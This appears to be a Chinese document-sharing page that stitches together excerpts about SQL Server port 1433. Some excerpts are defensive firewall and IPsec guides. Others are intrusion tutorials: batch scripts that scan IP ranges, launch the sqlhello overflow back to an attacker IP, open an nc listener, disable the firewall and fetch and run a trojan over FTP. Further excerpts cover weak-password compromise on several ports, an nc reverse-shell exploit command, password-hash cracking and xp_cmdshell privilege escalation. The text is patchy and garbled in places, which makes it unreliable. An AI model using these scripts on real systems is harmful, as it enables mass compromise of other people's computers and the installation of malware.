1433活跃ip段

合集下载

1433端口安全防护

1433端口安全防护

究竟什么是1433端口呢??,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP—1433、UDP—1434.其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口.很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了.可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口.不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。

在实例属性中选择TCP/IP协议的属性.选择隐藏SQL Server 实例。

如果隐藏了SQL Server 实例,则将禁止对试图枚举网络上现有的SQL Server 实例的客户端所发出的广播作出响应.这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan。

知道什么是1433端口了,鉴于对SQL数据库的入侵,大部分都是通过1433端口实现的,(额补充下MYSQL的默认端口是3306,原理是一样的)可以用很多端口扫描工具看看是否开启了这个端口。

关于如何入侵,怎么入侵,就不多说了,嘿嘿,网上也有很多,这里要注意的是,防止入侵,关了这个端口就OK了,请看下面的教程。

一.创建IP筛选器和筛选器操作1."开始”->"程序"-〉"管理工具"-〉”本地安全策略”.微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。

2.右击”Ip安全策略,在本地机器”,选择"管理IP 筛选器表和筛选器操作",启动管理IP 筛选器表和筛选器操作对话框。

我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略.3.在”管理IP 筛选器表”中,按”添加”按钮建立新的IP筛选器:1)在跳出的IP筛选器列表对话框内,填上合适的名称,我们这儿使用"tcp1433”,描述随便填写。

挖矿木马为什么会成为病毒木马的中流砥柱???

挖矿木马为什么会成为病毒木马的中流砥柱???

挖矿木马为什么会成为病毒木马的中流砥柱一、概述根据情报中心监测数据,2018年挖矿木马样本月产生数量在百万级别,且上半年呈现快速增长趋势,下半年上涨趋势有所减缓。

由于挖矿的收益可以通过数字加密货币系统结算,使黑色产业变现链条十分方便快捷,少了中间商(洗钱团伙)赚差价。

数字加密币交易系统的匿名性,给执法部门的查处工作带来极大难度。

在过去的2018年,挖矿病毒的流行程度已远超游戏盗号木马、远程控制木马、网络劫持木马、感染型病毒等等传统病毒。

以比特币为代表的虚拟加密币经历了过山车行情,许多矿场倒闭,矿机跌落到轮斤卖的地步。

但即使币值已大幅下跌,挖矿木马也未见减少。

因为控制他人的肉鸡电脑挖矿,成本为零。

当电脑运行挖矿病毒时,计算机CPU、GPU资源占用会上升,电脑因此变得卡慢,如果是笔记本电脑,会更容易观察到异常:比如电脑发烫、风扇转速增加,电脑噪声因此增加,电脑运行速度也因此变慢。

但是也有挖矿木马故意控制挖矿时占用的CPU资源在一定范围内,并且设置为检测到任务管理器时,将自身退出的特性,以此来减少被用户发现的几率。

根据情报中心监测数据,2018年挖矿木马样本月产生数量在百万级别,且全年呈现增长趋势。

我们对2018年挖矿病毒样本进行归类,对挖矿木马使用的端口号、进程名、矿池的特点进行统计,发现以下特点:挖矿木马最偏爱的端口号依次为3333、8008、8080。

挖矿木马喜欢将自身进程名命名为系统进程来迷惑用户,除了部分挖矿进程直接使用xxxminer外,最常使用的进程名为windows系统进程名:svchost.exe以及csrss.exe。

挖矿木马连接矿池挖矿,从矿池获取任务,计算后将任务提交到矿池。

矿工将自己的矿机接入矿池,贡献自己的算力共同挖矿,共享收益。

2018年挖矿木马应用最广泛的矿池为,其次为。

二、2018年挖矿木马传播特点1.瞄准游戏高配机,高效率挖矿辅助外挂是2018年挖矿木马最喜爱的藏身软件之一。

黑客常用的几种入侵端口的方法

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。

1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵=============================对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器。

exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。

(小榕的注入软件)。

5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。

(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe)==================================== ==对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。

如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。

如何关闭3389端口和1433端口

如何关闭3389端口和1433端口

单击添加...只用在安全措施种选择阻止就ok了(可以在描述中设置名称)
同样选上这个操作。确定后我们就完成了99%!
由于windows默认IP安全策略中的项目是没有激活的,所以我们要指派一下,点击指派。完成99.9%
重新启动!100%
其它的端口设置类似,多试试看~
PS:如果没有IP安全策略可以在控制台中新建
使用向上箭头直到不能再向上,并选上勾,然后保存(这一步忘记就白辛苦了|||)
其它端口的关闭设置方法类似,如要开放端口,把‘拦截’改为‘通行’就可以了。
方法2 自定义安全策略
如果我们手头暂时没有防火墙工具的话,那么可以利用Windows服务器自身的IP安全策略功能,来自定义一个拦截135端口的安全策略。
3、进入“筛选器属性”对话框,首先看到的是寻地址,源地址选“任何ip地址”,目标地址选“我的ip地址”,点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“tcp”,然后在“到此端口”的下的文本框中输入“135”,点击确定。这样就添加了一个屏蔽tcp135 端口的筛选器,可以防止外界通过135端口连上你的电脑。
以后如果要添加或者删除都可以同样操作。
----------------
我就把自己很早前摘下来的文章发给你,有一定的电脑知识相信参照上面的应该可以完成了.
分享给你的朋友吧:
i贴吧
新浪微博
腾讯微博
QQ空间
人人网
豆瓣
MSN
对我有帮助
8收藏到
手把手教你怎样防远程控制,有图0
今天有位仁兄发了篇关于防远程控制的文章,其实说的很对,但肯定很多人看不懂。
我看了玩家发帖说被控制被盗的很多,所以今天,我以图手把手教大家怎样防远程控制。

1433端口安全防护

1433端口安全防护

究竟什么是1433端口呢??,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。

其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。

可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。

不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。

在实例属性中选择TCP/IP协议的属性。

选择隐藏SQL Server 实例。

如果隐藏了SQL Server 实例,则将禁止对试图枚举网络上现有的SQL Server 实例的客户端所发出的广播作出响应。

这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan。

知道什么是1433端口了,鉴于对SQL数据库的入侵,大部分都是通过1433端口实现的,(额补充下MYSQL的默认端口是3306,原理是一样的)可以用很多端口扫描工具看看是否开启了这个端口。

关于如何入侵,怎么入侵,就不多说了,嘿嘿,网上也有很多,这里要注意的是,防止入侵,关了这个端口就OK了,请看下面的教程。

一.创建IP筛选器和筛选器操作1."开始"->"程序"->"管理工具"->"本地安全策略"。

微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。

2.右击"Ip安全策略,在本地机器",选择"管理IP 筛选器表和筛选器操作",启动管理IP 筛选器表和筛选器操作对话框。

提高SQL Server数据库安全性的几点思考

提高SQL Server数据库安全性的几点思考

提高SQL Server 数据库安全性的几点思考王桃群(长江大学计算机科学学院,湖北荆州434023)摘要:数据库的安全性指的是防止非法用户访问数据库,避免造成数据的泄露、更改或破坏,以达到保护数据库的目的。

为提高SQL Server 数据库的安全性,可考虑修改端口、使用强密码、灵活运用触发器等办法。

关键词:修改端口;强密码;触发器中图分类号:TP311文献标识码:A文章编号:1009-3044(2017)02-0001-011修改SQL Server 端口默认情况下,SQL Server 数据库引擎侦听TCP 端口1433,启动SQL Server 数据库引擎实例后,可在CMD 命令提示符窗口中执行netstat 命令来查看所有的连接及侦听的端口。

入侵者可利用相关工具扫描指定IP 段的1433端口,从而对这些IP 段内开放了1433端口的SQL Server 数据库服务器进行攻击。

为防止入侵者扫描1433端口,可修改SQL Server 端口,具体操作步骤:(1)打开SQL Server 的配置管理器,依次展开“SQL Server 网络配置”、“MSSQLSERVER 的协议”,双击TCP/IP 。

(2)在“TCP/IP 属性”对话框的“IP 地址”选项卡上,将显示若干个IP 地址,格式为:IP1、IP2…,一直到IPAll 。

在“IPn 属性”区域框的“TCP 端口”框中,输入希望此IP 地址侦听的端口号,然后单击“确定”。

(3)重启SQL Server 服务,端口就修改好了。

2设置验证模式、使用强密码SQL Server 的安全管理机制包括身份验证和访问许可。

其中,身份验证有Windows 身份验证和混合验证两种模式。

为提高数据库的安全性,尽可能使用Windows 身份验证,当用户通过Windows 账号连接时,SQL Server 使用操作系统中的Win⁃dows 主体标记验证账号和密码,也就是说,用户身份由Win⁃dows 进行确认。

如何打开1433端口的解决方法?

如何打开1433端口的解决方法?
这篇文章主要针对Win2003系统安装SQL Sever2000后1433端口未开放,如何打开1433端口的解决方法。
用了几年的Windows2003和SQL Server2000了,不过这个问题倒是头次遇到。最近调试一个JSP+SQL2000WEB程序遇到个现象,在Win2003简体中文服
喜你,你马上可以开始在企业管理器或查询分析器连接了。
三 检查客户端设置
程序->Microsoft SQL Server-> 客户端网络使用工具。像在服务器网络实用工具里一样,确保客户端tcp/ip协议
启用,并且默认端口为1433(或其他端口,与服务器端保持一致就行)。
四 在企业管理器里或查询分析器连接测试
查看安装光盘,是久经考验的安装盘,应该不会出问题。
6、系统的问题;
也看不出有什么其它的问题,难道是系统的问题?不过重装系统可太过麻烦,还是先想想其它的办法,看能不能
找到问题所在。
检查系统日志,这个应该是一个比较好的习惯。仔细翻了一遍重新安装后的日志,赫然发现如下内容:
您运行的 Microsoft SQL Server 2000 版本或 Microsoft SQL Server 2000 Desktop Engine (也称为 MSDE) 和
查询分析器->工具->选项->连接->在 登录超时(秒) 后面的框里输入一个较大的数字
通常就可以连通了,如果提示错误,则进入下一步。
五 错误产生的原因通常是由于SQL Server使用了”仅 Windows”的身份验证方式,因此用户无法使用SQL Server的
登录帐户(如 sa )进行连接。解决方法如下所示:

各端口抓肉鸡的几种方法

各端口抓肉鸡的几种方法
2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)
7、扫4899空口令抓肉鸡
工具:端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。
8、扫5900端口抓VNC肉鸡
工具:VNC扫描器 VNC连接器
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
4Hale Waihona Puke 入侵网站挂马 这个我也不会,准备学习,在这里也提一下吧。比如你要入侵一个网站,首先得用工具扫一下漏洞,然后凭借这些漏洞上传你做好的ASP网马,然后运行你的ASP网马,你就可以对这个网站的网页进行一系列修改,比如在他主页插入你的木马地址,这样别人在浏览这个网站的主页时就会中你的马了。中间过程也挺复杂了,我也只了解一点点,如果说错了还请各位批评指正。
忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。
5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scan SQL综合利用工具

Telnet 1433端口不通之端口的监听

Telnet 1433端口不通之端口的监听

Telnet 1433端口不通之端口的监听2010-07-22 12:48 佚名网络整理我要评论(0)字号:T | T文章摘要:下面我们来对Telnet 1433端口不通的具体内容进行一下分析。

这次针对的问题是如何检查端口的监听问题。

AD:Telnet服务无法启动和连接,就直接影响了我们的使用。

那么,前面我们分析了一部分Telnet 1433端口不通的原因。

这里我们主要讲解一下如何检查1433是否在监听?或者检查有哪些端口在监听?那么希望文章的内容能够帮助到大家。

1、如果打了sql sp3,并且windows 2003防火墙已经关闭, 在命令提示符下执行netstat -na 应该可以看到tcp 1433在监听.2、启动企业管理器查看SQL SERVER 2000 的系统日志,在日志中可以看到SQL SERVER 启动的是那些协议来等待远程连接的.另外记得打完补丁,重新启动机器,或者重新启动服务.远程连接sql server 2000服务器的解决方案解决方案步骤:一看ping 服务器IP能否ping通.这个实际上是看和远程sql server 2000服务器的物理连接是否存在.如果不行,请检查网络,查看配置,当然得确保远程sql server 2000服务器的IP拼写正确.二在Dos或命令行下输入Telnet服务器IP 端口,看能否连通.如Telnet 202.114.100.100 1433通常端口值是1433,因为1433是sql server 2000的对于Tcp/IP的默认侦听端口.如果有问题,通常这一步会出问题.通常Telnet 1433端口不通的提示是"……无法打开连接,连接失败".如果这一步有问题,应该检查以下选项.1 检查远程服务器是否启动了sql server 2000服务.如果没有,则启动.2 检查服务器端有没启用Tcp/IP协议,因为远程连接(通过因特网)需要靠这个协议.检查方法是,在服务器上打开开始菜单->程序->Microsoft SQL Server->服务器网络实用工具,看启用的协议里是否有tcp/ip 协议,如果没有,则启用它.3 检查服务器的tcp/ip端口是否配置为1433端口.仍然在服务器网络实用工具里查看启用协议里面的tcp/ip的属性,确保默认端口为1433,并且隐藏服务器复选框没有勾上.事实上,如果默认端口被修改,也是可以的,但是在客户端做telnet测试时,写服务器端口号时必须与服务器配置的端口号保持一致.如果隐藏服务器复选框被勾选,则意味着客户端无法通过枚举服务器来看到这台服务器,起到了保护的作用,但不影响连接,但是Tcp/ip协议的默认端口将被隐式修改为2433,在客户端连接时必须作相应的改变.4 如果服务器端操作系统打过sp2补丁,则要对windows防火墙作一定的配置,要对它开放1433端口,通常在测试时可以直接关掉windows防火墙(其他的防火墙也关掉最好).5 检查服务器是否在1433端口侦听.如果服务器没有在tcp连接的1433端口侦听,则是连接不上的.检查方法是在服务器的dos或命令行下面输入 netstat -a -n 或者是netstat -an,在结果列表里看是否有类似 tcp 127.0.0.11433 listening 的项.如果没有,则通常需要给sql server 2000打上至少sp4的补丁.其实在服务器端启动查询分析器,输入select @@version 执行后可以看到版本号,版本号在8.0.2039以下的都需要打补丁.如果以上都没问题,这时你再做Telnet服务器ip 1433 测试,将会看到屏幕一闪之后光标在左上角不停闪动.恭喜你,你马上可以开始在企业管理器或查询分析器连接了.三检查客户端Telnet 1433端口的设置程序->Microsoft SQL Server-> 客户端网络使用工具.像在服务器网络实用工具里一样,确保客户端tcp/ip 协议启用,并且默认端口为1433(或其他端口,与服务器端保持一致就行).四在企业管理器里或查询分析器连接测试企业管理器->右键SQlserver组->新建sqlserver注册->下一步->写入远程IP->下一步-> 选Sqlserver 登陆->下一步->写入登陆名与密码(sa,password)->下一步->下一步->完成查询分析器->文件->连接->写入远程IP->写入登录名和密码(sa,password)->确定通常建议在查询分析器里做,因为默认情况下,通过企业管理器注册另外一台SQL Server的超时设置是4秒,而查询分析器是15秒.修改默认连接超时的方法:企业管理器->工具->选项->在弹出的"SQL Server企业管理器属性"窗口中,点击"高级"选项卡->连接设置->在登录超时(秒)后面的框里输入一个较大的数字查询分析器->工具->选项->连接->在登录超时(秒)后面的框里输入一个较大的数字通常就可以连通了,如果提示错误,则进入下一步.五错误产生Telnet 1433端口不通的原因通常是由于SQL Server使用了"仅 Windows"的身份验证方式,因此用户无法使用SQL Server的登录帐户(如 sa )进行连接.解决方法如下所示:1 在服务器端使用企业管理器,并且选择"使用 Windows 身份验证"连接上 SQL Server.2 展开"SQL Server组",鼠标右键点击SQL Server服务器的名称,选择"属性",再选择"安全性"选项卡.3 在"身份验证"下,选择"SQL Server和 Windows ".4 重新启动SQL Server服务.(在dos或命令行下面net stop mssqlserver停止服务,net startmssqlserver 启动服务,也是一种快捷的方法).注:在连接本地服务器时,通常使用的是命名管道协议(在服务器网络实用工具里可以看到启用的协议有这个),默认端口是445,因此在本地能连通是不能说明什么问题的,连接远程服务器是完全不同的协议).。

安全策略设置阻止所有IP访问1433

安全策略设置阻止所有IP访问1433

安全策略设置阻止所有IP访问1433,可我想特定某个IP可以访问.第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。

在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。

第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。

第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“1433”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 1433(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、1433.3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。

第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。

在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。

各端口抓肉鸡的几种方法

各端口抓肉鸡的几种方法

各端口抓肉鸡的几种方法.txt看一个人的的心术,要看他的眼神;看一个人的身价,要看他的对手;看一个人的底牌,要看他的朋友。

明天是世上增值最快的一块土地,因它充满了希望。

1、扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。

首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。

缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。

因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。

(详细动画可以去黑客网站搜索135)3、扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。

因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。

(详细动画可以去黑客网站搜索445)4、1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。

要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件@echo offfor /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save@echo offfor /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理@echo offNc -l -vv -p 556>daima.txtecho username>>daima.txtecho password>>daima.txtecho bin>>daima.txt(以2进制传输数据)echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txtecho bye>>daima.txtnet stop sharedaccess(关闭WINDOWS自带防火墙)ftp -s:daima.txtxxx.exe(也是填你木马的文件名)del daima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。

1433提权详解

1433提权详解

1433提权详解!!!随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。

插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。

把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。

1433端口安全防护

1433端口安全防护

究竟什么是1433端口呢??,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP—1433、UDP-1434。

其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口.很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。

可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。

不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦.在实例属性中选择TCP/IP 协议的属性.选择隐藏SQL Server 实例。

如果隐藏了SQL Server 实例,则将禁止对试图枚举网络上现有的SQL Server 实例的客户端所发出的广播作出响应。

这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan。

知道什么是1433端口了,鉴于对SQL数据库的入侵,大部分都是通过1433端口实现的,(额补充下MYSQL的默认端口是3306,原理是一样的)可以用很多端口扫描工具看看是否开启了这个端口。

关于如何入侵,怎么入侵,就不多说了,嘿嘿,网上也有很多,这里要注意的是,防止入侵,关了这个端口就OK了,请看下面的教程。

一。

创建IP筛选器和筛选器操作1。

"开始”—>"程序”—>"管理工具”-〉"本地安全策略”。

微软建议使用本地安全策略进行IPsec 的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。

2.右击"Ip安全策略,在本地机器",选择"管理IP 筛选器表和筛选器操作",启动管理IP 筛选器表和筛选器操作对话框。

我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略。

关闭端口1433,阻止sql2000服务器远程入侵

关闭端口1433,阻止sql2000服务器远程入侵

设置安全策略:
“控制面板”——〉“管理工具”——〉“本地安全策略”
选择IP安全策略—创建IP安全策略—建立名称—默认下一步
OK 建立新的策略完成选择你新建的策略–属性然后添加
下一步
选择Kerberos V5协议继续下一步选择是选择所有IP通讯
继续下一步完成选中“所有IP 通讯”——〉点“编辑”按钮,打开“IP筛选器列表”——〉继续点“编辑”按钮,打开“筛选器属性”
完成上面配置后在你刚配置的策略右键指派
指派出错的请启动下图服务。

配置完成后重新启动机器。

如何验证数据库的1433已经不能连接?
方法一:
局域网内找一个机器(非本机)安装企业管理,添加注册刚刚配制过安全策略的服务器,应
该是那个等待注册的画面,状态中显示:“正在验证注册信息”或拒绝连接或服务未开启的提示。

方法二:
局域网内找一个机器(非本机),在dos控制台下,输入telnet EP服务器IP 1433
如果安全策略应用成功的话,应该不能够连接,会出现如下的话:正在连接到xxxxxxx...无法打开到主机的连接在端口1433 : 连接失败。

如果应用安全策略失败,则能够连接成功。

检查本地TCPIP端口1433是否被监听

检查本地TCPIP端口1433是否被监听

在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。

而在TCP/IP协议栈中,网络层和传输层只关心目标主机的IP地址。

这就导致在以太网中使用IP协议时,数据链路层的以太网协议接到上层IP协议提供的数据中,只包含目的主机的IP地址。

于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。

这就是ARP协议要做的事情。

所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。

另外,当发送主机和目的主机不在同一个局域网中时,即便知道目的主机的MAC地址,两者也不能直接通信,必须经过路由转发才可以。

所以此时,发送主机通过ARP协议获得的将不是目的主机的真实MAC 地址,而是一台可以通往局域网外的路由器的某个端口的MAC地址。

于是此后发送主机发往目的主机的所有帧,都将发往该路由器,通过它向外发送。

这种情况称为ARP代理(ARP Proxy)。

工作原理ARP在每台安装有TCP/IP协议的电脑里都有一个ARP缓存表,表里的IP地址与MAC地址是一一对应的。

ARP工作原理以主机 A(192.168.1.5)向主机B(192.168.1.1)发送数据为例。

当发送数据时,主机A会在自己的ARP 缓存表中寻找是否有目标IP地址。

如果找到了,也就知道了目标MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到目标IP地址,主机 A就会在网络上发送一个广播,A 主机MAC地址是“主机A的MAC地址”,这表示向同一网段内的所有主机发出这样的询问:“我是192.168.1.5,我的硬件地址是"主机A的MAC地址".请问IP地址为192.168.1.1的MAC地址是什么?”网络上其他主机并不响应ARP询问,只有主机B接收到这个帧时,才向主机A做出这样的回应:“192.168.1.1的MAC地址是00-aa-00-62-c6-09”。

相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
相关文档
最新文档